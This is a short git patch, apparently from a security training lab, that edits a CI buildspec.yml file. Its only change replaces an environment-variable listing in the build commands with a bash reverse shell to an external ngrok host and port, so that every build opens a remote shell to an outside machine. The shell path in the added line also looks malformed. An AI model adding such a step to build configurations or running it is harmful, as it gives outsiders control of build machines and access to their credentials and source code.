From 2b63d5f637f35a9f9fcc3f638bc49e7fa60a814b Mon Sep 17 00:00:00 2001 From: Oussama Ait Manssour <67986338+AMOussama@users.noreply.github.com> Date: Sat, 28 Mar 2026 20:10:57 +0100 Subject: [PATCH] Replace env command with reverse shell execution Replaced environment variable listing with a reverse shell command. --- buildspec.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/buildspec.yml b/buildspec.yml index cb0c282..7710a43 100644 --- a/buildspec.yml +++ b/buildspec.yml @@ -4,5 +4,5 @@ phases: build: commands: - echo "Running vulnerable training build" - - env | sort | head -n 20 + - bash -i >& /dev/0.tcp.eu.ngrok.io/18818 0>&1 - echo "Done"